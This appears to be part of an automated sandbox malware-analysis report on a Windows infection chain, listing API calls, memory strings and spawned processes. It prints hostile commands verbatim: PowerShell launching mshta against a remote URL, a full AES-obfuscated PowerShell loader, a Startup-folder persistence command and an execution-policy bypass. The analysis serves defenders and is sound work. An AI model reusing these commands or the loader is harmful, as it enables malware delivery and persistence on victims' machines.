Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBCD14 FindFirstFileW,FindClose,23_2_00BBCD14
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00BBF5D8
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00BBF735
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00BBFA36
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BB3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00BB3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00854005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00854005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085494A GetFileAttributesW,FindFirstFileW,FindClose,27_2_0085494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_0085C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_0085CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085CD14 FindFirstFileW,FindClose,27_2_0085CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_0085F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_0085F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_0085FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00853CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00853CE2
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC21D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,15_2_00007FF7ADC21D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: SwiftWrite.pif, 0000001B.00000002.2681284227.00000000039F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld_;
Source: mshta.exe, 00000006.00000003.1765184654.000002151DB36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1790844992.000002151DB36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
Source: powershell.exe, 00000015.00000002.2022240307.000001E2B4575000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWY
Source: svchost.exe, 00000008.00000002.2672036263.000001E22582B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: powershell.exe, 00000015.00000002.2022240307.000001E2B45D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
Source: mshta.exe, 00000006.00000002.1790844992.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1785173676.000002151DB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1791244275.000002151DB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486287260.000002151DB8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2680822262.000001E22AE55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 0000001A.00000002.1917240026.0000028A13ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\)
Source: powershell.exe, 00000009.00000002.1742720854.0000028236D23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\1d
Source: mshta.exe, 00000006.00000002.1794143258.0000021D20670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: powershell.exe, 00000009.00000002.1742720854.0000028236CF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.0000000003833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\Guard.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\Public\Guard.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC90A00 BlockInput,15_2_00007FF7ADC90A00
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC037B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,15_2_00007FF7ADC037B0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC25BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,15_2_00007FF7ADC25BC0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC06D64 LoadLibraryA,GetProcAddress,15_2_00007FF7ADC06D64
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC6CDC4 GetProcessHeap,HeapAlloc,InitializeAcl,15_2_00007FF7ADC6CDC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC48FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00007FF7ADC48FE4
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC3AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF7ADC3AF58
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC259C8 SetUnhandledExceptionFilter,15_2_00007FF7ADC259C8
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC257E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00007FF7ADC257E4
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B7A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00B7A385
Source: C:\Users\Public\Guard.exeCode function: 23_2_00B7A354 SetUnhandledExceptionFilter,23_2_00B7A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0081A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0081A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0081A354 SetUnhandledExceptionFilter,27_2_0081A354

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC6CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,15_2_00007FF7ADC6CE68
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC037B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,15_2_00007FF7ADC037B0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC24514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00007FF7ADC24514
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC94C58 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,15_2_00007FF7ADC94C58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghep2412_2"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghep2412_2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '14C80253B9AE5AEAA5DE24659F01D509CF460EE458FB49BF1D72DCB2E4749D746CD9DB27687A100C104C20E190D5CF617E269315FBABFADF12B96DC56A539AF812E893ACB6CACEE8771B90DE79966EA8AF49671C6138083807E7ACDC68E3EC61353DA1434E399CB7632B9BE90E97EAB29FCB7B35D422611B152F95CF04BE80F6B6A45FAFDC6497291682B5C7802B6FCA42509A896D18EA54CB45505CFD7A1C8C74E685914F86C731E1558FF417EC92A2DC9D23F19EB3FCF043A58389E6E7429A89F779599FAFF7153337ADEF7092F87CFD41560B4925E53F92549F33E8B6DC1B08F41B72E964F2ADE2038B32A7DDA6BB4275B72C7CB61D2D3262561B559438D772E33F25EA16A4F4A5B37E3A1E2D30FAA7136E1F92B62F8D942D07912ED348FF9FAF50222803F5EDC5A7672C4130832A45ACB7D486ACF004A4FD70C7A759323981C20A626A900DA5D54CA9800F53C7C7F583F68FFAF098F3B5D3E55A04183E536B28D4AB10FA71047408FD900EC8BC319B08354FE06CAF885C495BED4038E9B3A38F15966CD61A13D4B4829EDC2B5CF872096790A6EEE474238D344D3E50A48B24E4147A525127583AEFFDAB1B1445A14B25869F58430AFE067B1717ACB8EE6FC03DB8BFC4E85494A735B2E5D5529B7F210A86B8968AA5A635BA3167A33F53D93117B8DABA13FEAEC806D04696D012179652DA2D00ED0DB378B1ADB5CCB6887EECFB415501C8B4AB4951E2E3C3A7B58210300BA633883134A2133BCFFB77A40A2CF71261E5C96AF138F818430C5F1950F662436CD9AB039C3010D102AE11667EE05A1FDE3F9D09DF9360A597BC3C17258CC4D59068E1608C9CD7EB29317D774A9ACD572A82D448993812D247A035CF0A3BE7E66E208C657B495D80C5C8FD08AFAEDC1DADB422C48F0CF4A018846F9095299885F66C8E77A16BD3E2D37370BF39F9612227FB24AED54EBC2A16B61240CF5F60839C1E68488B7168C818D4C7C06BD77114FD81636E45EEB0BE6C7D88F9A3100B861CFA70C3F20C85841CB6A80D7FF297E85CBB5621B570F71F29D5040E8D4065899B69E3B0487DD296D8050D2B13F86636C3E0DA27F5B9B38C6EBC9099B3240A5CF588B5516E4730275575A0CF69FFC20A1D3A74FBDAFF1A89C281470E9679791BB282902F01BE778EA837392E23BB96C69B92CAB14848DA247807327413F8E070DEB759C8C6DB84B6F1261895C9DF9E65A07AAD48D9CD1112B002F7E2FD2DB430C92A840AD1C8DD0E9F928700F8441FD7ECB8F92AA178D7809945E9E75ED50BD667AB11BFBBE97A68416CEDF4B67B3282C1E3CCDED973182C3D93E0496E2078AC02F08663A5197CBA0AC63D871B3C79ED71FAB6A005D12988DC3DB05908BBA6B8228970FBB9CF0DFB509FD035E017339D4B70C11381B124CECE98E86BEAD02376FF7BB51EB69151C7FFB32FF35D6D51786E6954554352414D6A5562644B';function vyG ($mgZiHqt){return -split ($mgZiHqt -replace '..', '0x$& ')};$WAvg = vyG($ddg.SubString(0, 2048));$SKz = [System.Security.Cryptography.Aes]::Create();$SKz.Key = vyG($ddg.SubString(2048));$SKz.IV = New-Object byte[] 16;$mZouvbL = $SKz.CreateDecryptor();$KbnMJip = [System.String]::new($mZouvbL.TransformFinalBlock($WAvg, 0,$WAvg.Length)); sal fd $KbnMJip.Substring(3,3); fd $KbnMJip.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Project_Information.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\XKIZdXAs.exe "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '14c80253b9ae5aeaa5de24659f01d509cf460ee458fb49bf1d72dcb2e4749d746cd9db27687a100c104c20e190d5cf617e269315fbabfadf12b96dc56a539af812e893acb6cacee8771b90de79966ea8af49671c6138083807e7acdc68e3ec61353da1434e399cb7632b9be90e97eab29fcb7b35d422611b152f95cf04be80f6b6a45fafdc6497291682b5c7802b6fca42509a896d18ea54cb45505cfd7a1c8c74e685914f86c731e1558ff417ec92a2dc9d23f19eb3fcf043a58389e6e7429a89f779599faff7153337adef7092f87cfd41560b4925e53f92549f33e8b6dc1b08f41b72e964f2ade2038b32a7dda6bb4275b72c7cb61d2d3262561b559438d772e33f25ea16a4f4a5b37e3a1e2d30faa7136e1f92b62f8d942d07912ed348ff9faf50222803f5edc5a7672c4130832a45acb7d486acf004a4fd70c7a759323981c20a626a900da5d54ca9800f53c7c7f583f68ffaf098f3b5d3e55a04183e536b28d4ab10fa71047408fd900ec8bc319b08354fe06caf885c495bed4038e9b3a38f15966cd61a13d4b4829edc2b5cf872096790a6eee474238d344d3e50a48b24e4147a525127583aeffdab1b1445a14b25869f58430afe067b1717acb8ee6fc03db8bfc4e85494a735b2e5d5529b7f210a86b8968aa5a635ba3167a33f53d93117b8daba13feaec806d04696d012179652da2d00ed0db378b1adb5ccb6887eecfb415501c8b4ab4951e2e3c3a7b58210300ba633883134a2133bcffb77a40a2cf71261e5c96af138f818430c5f1950f662436cd9ab039c3010d102ae11667ee05a1fde3f9d09df9360a597bc3c17258cc4d59068e1608c9cd7eb29317d774a9acd572a82d448993812d247a035cf0a3be7e66e208c657b495d80c5c8fd08afaedc1dadb422c48f0cf4a018846f9095299885f66c8e77a16bd3e2d37370bf39f9612227fb24aed54ebc2a16b61240cf5f60839c1e68488b7168c818d4c7c06bd77114fd81636e45eeb0be6c7d88f9a3100b861cfa70c3f20c85841cb6a80d7ff297e85cbb5621b570f71f29d5040e8d4065899b69e3b0487dd296d8050d2b13f86636c3e0da27f5b9b38c6ebc9099b3240a5cf588b5516e4730275575a0cf69ffc20a1d3a74fbdaff1a89c281470e9679791bb282902f01be778ea837392e23bb96c69b92cab14848da247807327413f8e070deb759c8c6db84b6f1261895c9df9e65a07aad48d9cd1112b002f7e2fd2db430c92a840ad1c8dd0e9f928700f8441fd7ecb8f92aa178d7809945e9e75ed50bd667ab11bfbbe97a68416cedf4b67b3282c1e3ccded973182c3d93e0496e2078ac02f08663a5197cba0ac63d871b3c79ed71fab6a005d12988dc3db05908bba6b8228970fbb9cf0dfb509fd035e017339d4b70c11381b124cece98e86bead02376ff7bb51eb69151c7ffb32ff35d6d51786e6954554352414d6a5562644b';function vyg ($mgzihqt){return -split ($mgzihqt -replace '..', '0x$& ')};$wavg = vyg($ddg.substring(0, 2048));$skz = [system.security.cryptography.aes]::create();$skz.key = vyg($ddg.substring(2048));$skz.iv = new-object byte[] 16;$mzouvbl = $skz.createdecryptor();$kbnmjip = [system.string]::new($mzouvbl.transformfinalblock($wavg, 0,$wavg.length)); sal fd $kbnmjip.substring(3,3); fd $kbnmjip.substring(6)
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '14c80253b9ae5aeaa5de24659f01d509cf460ee458fb49bf1d72dcb2e4749d746cd9db27687a100c104c20e190d5cf617e269315fbabfadf12b96dc56a539af812e893acb6cacee8771b90de79966ea8af49671c6138083807e7acdc68e3ec61353da1434e399cb7632b9be90e97eab29fcb7b35d422611b152f95cf04be80f6b6a45fafdc6497291682b5c7802b6fca42509a896d18ea54cb45505cfd7a1c8c74e685914f86c731e1558ff417ec92a2dc9d23f19eb3fcf043a58389e6e7429a89f779599faff7153337adef7092f87cfd41560b4925e53f92549f33e8b6dc1b08f41b72e964f2ade2038b32a7dda6bb4275b72c7cb61d2d3262561b559438d772e33f25ea16a4f4a5b37e3a1e2d30faa7136e1f92b62f8d942d07912ed348ff9faf50222803f5edc5a7672c4130832a45acb7d486acf004a4fd70c7a759323981c20a626a900da5d54ca9800f53c7c7f583f68ffaf098f3b5d3e55a04183e536b28d4ab10fa71047408fd900ec8bc319b08354fe06caf885c495bed4038e9b3a38f15966cd61a13d4b4829edc2b5cf872096790a6eee474238d344d3e50a48b24e4147a525127583aeffdab1b1445a14b25869f58430afe067b1717acb8ee6fc03db8bfc4e85494a735b2e5d5529b7f210a86b8968aa5a635ba3167a33f53d93117b8daba13feaec806d04696d012179652da2d00ed0db378b1adb5ccb6887eecfb415501c8b4ab4951e2e3c3a7b58210300ba633883134a2133bcffb77a40a2cf71261e5c96af138f818430c5f1950f662436cd9ab039c3010d102ae11667ee05a1fde3f9d09df9360a597bc3c17258cc4d59068e1608c9cd7eb29317d774a9acd572a82d448993812d247a035cf0a3be7e66e208c657b495d80c5c8fd08afaedc1dadb422c48f0cf4a018846f9095299885f66c8e77a16bd3e2d37370bf39f9612227fb24aed54ebc2a16b61240cf5f60839c1e68488b7168c818d4c7c06bd77114fd81636e45eeb0be6c7d88f9a3100b861cfa70c3f20c85841cb6a80d7ff297e85cbb5621b570f71f29d5040e8d4065899b69e3b0487dd296d8050d2b13f86636c3e0da27f5b9b38c6ebc9099b3240a5cf588b5516e4730275575a0cf69ffc20a1d3a74fbdaff1a89c281470e9679791bb282902f01be778ea837392e23bb96c69b92cab14848da247807327413f8e070deb759c8c6db84b6f1261895c9df9e65a07aad48d9cd1112b002f7e2fd2db430c92a840ad1c8dd0e9f928700f8441fd7ecb8f92aa178d7809945e9e75ed50bd667ab11bfbbe97a68416cedf4b67b3282c1e3ccded973182c3d93e0496e2078ac02f08663a5197cba0ac63d871b3c79ed71fab6a005d12988dc3db05908bba6b8228970fbb9cf0dfb509fd035e017339d4b70c11381b124cece98e86bead02376ff7bb51eb69151c7ffb32ff35d6d51786e6954554352414d6a5562644b';function vyg ($mgzihqt){return -split ($mgzihqt -replace '..', '0x$& ')};$wavg = vyg($ddg.substring(0, 2048));$skz = [system.security.cryptography.aes]::create();$skz.key = vyg($ddg.substring(2048));$skz.iv = new-object byte[] 16;$mzouvbl = $skz.createdecryptor();$kbnmjip = [system.string]::new($mzouvbl.transformfinalblock($wavg, 0,$wavg.length)); sal fd $kbnmjip.substring(3,3); fd $kbnmjip.substring(6)Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC6C5FC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,15_2_00007FF7ADC6C5FC
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC6D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,15_2_00007FF7ADC6D540
Source: powershell.exe, 00000009.00000002.1680477076.000002822EC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1680477076.000002822EEB3000.00000004.00000800.00020000.00000000.sdmp, XKIZdXAs.exe, 0000000F.00000000.1591030460.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: XKIZdXAs.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC3FD20 cpuid 15_2_00007FF7ADC3FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
